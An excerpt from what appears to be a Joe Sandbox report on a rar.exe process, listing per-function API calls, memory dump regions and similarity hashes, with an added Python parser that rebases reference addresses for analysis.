• Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
• Instruction Fuzzy Hash: D7414672A1868146FB64CF28E5087A966A0B749BB8F001738EF7D83AE4CF7CC445CB00

Control-flow Graph

APIs
Strings
Similarity
• API ID: swprintf
• String ID: rar.ini$switches=$switches_%ls=
• API String ID: 233258989-2235180025
• Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
• Instruction ID: 63831fc5672fe098f92974a97fdb3fb90395a02d5ff163f6a4f7523ea034b31e
• Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
• Instruction Fuzzy Hash: F641BF22B1868281EB14EB29D5241F967B0FF587A4F401635EB9E83AF6EF3CE545C740

Control-flow Graph

APIs
Strings
Similarity
• API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
• String ID: rar.lng
• API String ID: 553376247-2410228151
• Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
• Instruction ID: 7b7a6fa2eeb3f370f0c05f169f96e885bc84e60d85c025e23e50703599941f02
• Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
• Instruction Fuzzy Hash: 52419F21E1C28285FA18EB29A41A2BD23B0BF9D754F685135DB0DCB2F7CF2DE4058750

Control-flow Graph

APIs
• SHGetMalloc.SHELL32(?,00000800,?,00007FF6BBCE4432,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE40C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE40DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF6BBCE40F1
  • Part of subcall function 00007FF6BBCD3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6BBCE413F,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD34A0
  • Part of subcall function 00007FF6BBCD3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6BBCE413F,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD34D5
Strings
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
• Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction ID: ffeb8c00326c204880690242a401253c07f449bbf6c083e0fed8181191d23f15
• Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction Fuzzy Hash: 62216F16A08A8281EE54DF2AF8552BE6770BF8DBD0B485031EF0E87765DF3CE4458700
APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD197A5
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD19807
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD19841
• FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD1986B
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1557788787-0
                                                                                                                                                                                                                              • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction ID: 3da73b643b6c687e04f1c83ebf038dd4d3441d2ca58ae98e7c3a734390f439de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A214121E197A185E6288F1AA440229A6A4FF5CFD0F4C4335DF9EA7BB4DF3CE4528744
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction ID: 8b90823c10bf64a59ebc974be295f1b29833fb824dd4645b7852113336a5dc9c
• Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction Fuzzy Hash: 0F219035E8C94681EA60CB2AF40833A62B4BF89B94F205531EB99C76E5CF3DD8818741
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: 801ce4505cd3594f32c35cc0aa3b4417f52e4b9923a07f7da0fe8a095c8003eb
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: B481C126E0CA9280EB70DB1991593BD22B0BF69784F44C031EF8D876F6DF6DA585C790
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction ID: fc6bf0d7a6a2ca692df59d6db2f01e031e3e8dd2ab40efe6324bff5c3917f8e2
• Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction Fuzzy Hash: 21218922E1876241EB688B2DD4901392655FB4A774F2C5375D76E477F8CE3CD481C305
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Threadwcschr$CreateExceptionPriorityThrow
• String ID: CreateThread failed
• API String ID: 1217111108-3849766595
• Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
• Instruction ID: 6751663255197736d8a50cd4ece211c3ff2767b540d7b8f76193675932fa91ec
• Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
• Instruction Fuzzy Hash: 49114F31A08A4292EB09DF19E8442BE7370FF98784F544136DB9D86679DF7CE546C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
• Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction ID: 86bccde3141c975d57445bf6e820a5b8b47bb0f6ab270ba694f704e39a79b676
• Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction Fuzzy Hash: 10F06D22A08A8682EA24DF29E5440BD6370FFCDBD8F040271DF9D46679CF2CD5498B00
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ConsoleFileHandleModeType
• String ID:
• API String ID: 4141822043-0
• Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction ID: d13fdde27ca06155c1bbeb5ac15739f72fe1111ade15345ceeda123f962e4a13
• Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction Fuzzy Hash: 79E08C20E04A4242EA588B29A8691380261FF5DB80F502034DA0FCA370EE2C94858310
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction ID: 8c750fbe3597ee437eceada4f2ba66f8c3350c51c20e6d1d811a44c4d3d3b341
• Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction Fuzzy Hash: AAE01A20A08B5646EB4C6B28A8817792352BFAC741F045A38CE0E823A2CE3EA4098250
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
• Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction ID: e1860d58c5b6f307c1d601193b8466717ef858110db6f96f0f80e1873889b53f
• Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction Fuzzy Hash: 68E1D426A9868286EB30CF28E4591BE67B0FB59794F444131DB9D87AF9DF7CE481C700
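The entries in this part of the report are raw per-function records (an explicit API list, the memory dump the function was lifted from, the IDA snapshot name, and the similarity identifiers). What an analyst usually wants from them is a table they can pivot on: which dumped region is executable, which functions reference a given API, and the `ref:` addresses rebased to RVAs so they can be looked up in the on-disk rar image rather than at the sandbox's load address. The following parser is an added example written for this page; it is not Joe Sandbox code and Joe Sandbox does not document these formats here. The `.sdmp` field layout it decodes (`pid.phase.seq.base.protect.state.type.module`) is an assumption inferred from the values on this page: the fifth field takes the values 0x02, 0x04, 0x08 and 0x20, which are the winnt.h PAGE_* constants, and the seventh is 0x01000000, which is MEM_IMAGE. The sample input is constructed from two of the entries on this page (the CriticalSection function and the CreateFileW wrapper).

```python
"""Parse Joe Sandbox per-function blocks (APIs / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity) into records, decode the .sdmp
file-name fields and rebase 'ref:' addresses to RVAs.

Added example, not Joe Sandbox code. ASSUMPTION: the .sdmp layout
pid.phase.seq.base.protect.state.type.module is inferred from the values on
this page (field 5 equals winnt.h PAGE_* values, field 7 is MEM_IMAGE).
"""
import re
from dataclasses import dataclass, field

PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}
HEX8, HEX16 = r"[0-9A-F]{8}", r"[0-9A-F]{16}"
SDMP_RE = re.compile(rf"(?P<pid>{HEX8})\.{HEX8}\.\d+\.(?P<base>{HEX16})\."
                     rf"(?P<protect>{HEX8})\.{HEX8}\.(?P<type>{HEX8})\.{HEX8}\.sdmp", re.I)
API_RE = re.compile(rf"^(?P<name>\w+)\.(?P<module>\w+)\(.*\),\s*ref:\s*(?P<ref>{HEX16})$", re.I)
SNAPSHOT_RE = re.compile(r"hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>[0-9a-f]+)_(?P<tag>\w+)\.jbxd", re.I)


@dataclass
class Region:
    pid: int
    base: int
    protect: str
    mem_type: str


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # (api, resolving module, ref address)
    regions: list = field(default_factory=list)     # Region objects, source dump first
    module_base: int = 0                            # the 'Offset:' of the source dump
    snapshot: dict = field(default_factory=dict)    # parsed hcaresult_*.jbxd name
    similarity: dict = field(default_factory=dict)  # API ID, String ID, fuzzy hashes ...

    def api_rvas(self):
        """ref addresses rebased to RVAs, usable in IDA on the on-disk image."""
        return [(n, m, ref - self.module_base) for n, m, ref in self.apis]


def parse_sdmp(name):
    m = SDMP_RE.search(name)
    if m is None:
        return None
    prot, mtype = int(m["protect"], 16), int(m["type"], 16)
    return Region(int(m["pid"], 16), int(m["base"], 16),
                  PAGE_PROTECT.get(prot, f"0x{prot:X}"), MEM_TYPE.get(mtype, f"0x{mtype:X}"))


def parse_report(text):
    """Line-oriented state machine; every 'APIs' header starts a new function record."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            section = "APIs"
        elif line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
        elif rec is None:
            continue
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                rec.apis.append((m["name"], m["module"], int(m["ref"], 16)))
        elif section == "Memory Dump Source":
            region = parse_sdmp(line)
            if region:
                rec.regions.append(region)
            m = re.search(rf"Offset:\s*({HEX16})", line, re.I)
            if m:
                rec.module_base = int(m.group(1), 16)
        elif section == "Joe Sandbox IDA Plugin":
            m = SNAPSHOT_RE.search(line)
            if m:
                rec.snapshot = {"pid": int(m["pid"]), "phase": int(m["phase"]),
                                "base": int(m["base"], 16), "tag": m["tag"]}
        elif section == "Similarity":
            key, _, value = line.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records


def find_by_api(records, api_name):
    """Records whose explicit API list names api_name (e.g. to pivot on CreateFileW)."""
    return [r for r in records if any(n == api_name for n, _, _ in r.apis)]


# Constructed sample: two entries copied from this report (the CriticalSection
# function, which has no explicit API list, then the CreateFileW wrapper).
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
• Instruction Fuzzy Hash: 10F06D22A08A8682EA24DF29E5440BD6370FFCDBD8F040271DF9D46679CF2CD5498B00
APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6BBCC7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6BBCC7C48), ref: 00007FF6BBCD1B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6BBCC7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6BBCC7C48), ref: 00007FF6BBCD1BD7
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
"""
```

Two checks fall out of the parsed records. The snapshot name `hcaresult_105_2_7ff6bbcb0000_rar.jbxd` and the `.sdmp` names agree with each other (pid 105 is 0x69, the base is 0x7FF6BBCB0000, and the tag names the dumped image as rar), which is the sanity check to run before trusting the rebased addresses. The sandbox lists the same CreateFileW call resolved through both KERNEL32 and KERNELBASE, so both references come back; rebased against the `Offset:` they become RVA 0x21B8D and 0x21BD7, which is where to look in the on-disk rar image.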
APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6BBCC7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6BBCC7C48), ref: 00007FF6BBCD1B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6BBCC7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6BBCC7C48), ref: 00007FF6BBCD1BD7
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction ID: 6414cde3780e3bf09682048fe3e497bfd21a08f9f3db79de99961f61c549e301
